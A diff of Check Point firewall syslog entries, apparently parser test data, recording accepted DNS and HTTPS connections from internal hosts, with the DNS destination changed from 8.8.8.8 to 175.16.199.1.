+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53804"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51711"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43223"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40944"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38032"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x14,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50418"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503730"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38708"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503730"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45599"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf2,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503730"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41324"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503730"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38708"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503730"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45599"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf2,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503730"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41324"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf2,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36846"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40170"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60027"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50441"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40170"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60027"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50441"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.21"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59166"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.42.157"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33196"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddf5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38655"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503733"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58757"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf5,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503733"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35619"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503733"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58757"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf5,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503733"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35619"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddf5,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35156"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10107"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddf5,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46553"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
